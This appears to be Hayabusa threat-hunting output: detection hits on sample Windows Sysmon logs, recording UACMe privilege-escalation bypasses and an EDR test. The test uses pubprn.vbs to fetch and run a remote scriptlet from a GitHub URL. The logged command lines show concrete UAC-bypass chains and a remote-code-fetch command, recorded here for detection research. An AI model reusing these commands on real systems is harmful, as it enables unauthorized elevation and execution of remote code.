+2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  34  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C:  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  33  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe""   :  Path: C:\Windows\System32\fodhelper.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe""   :  Path: C:\Windows\System32\fodhelper.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  32  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  30  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe""   :  Path: C:\Windows\SysWOW64\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe""   :  Path: C:\Windows\SysWOW64\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80  :  Path: C:\Windows\SysWOW64\WerFault.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  23  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml  :  Path: C:\Windows\System32\PkgMgr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml  :  Path: C:\Windows\System32\PkgMgr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""  :  Path: C:\Windows\System32\Dism.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  22  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  37  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
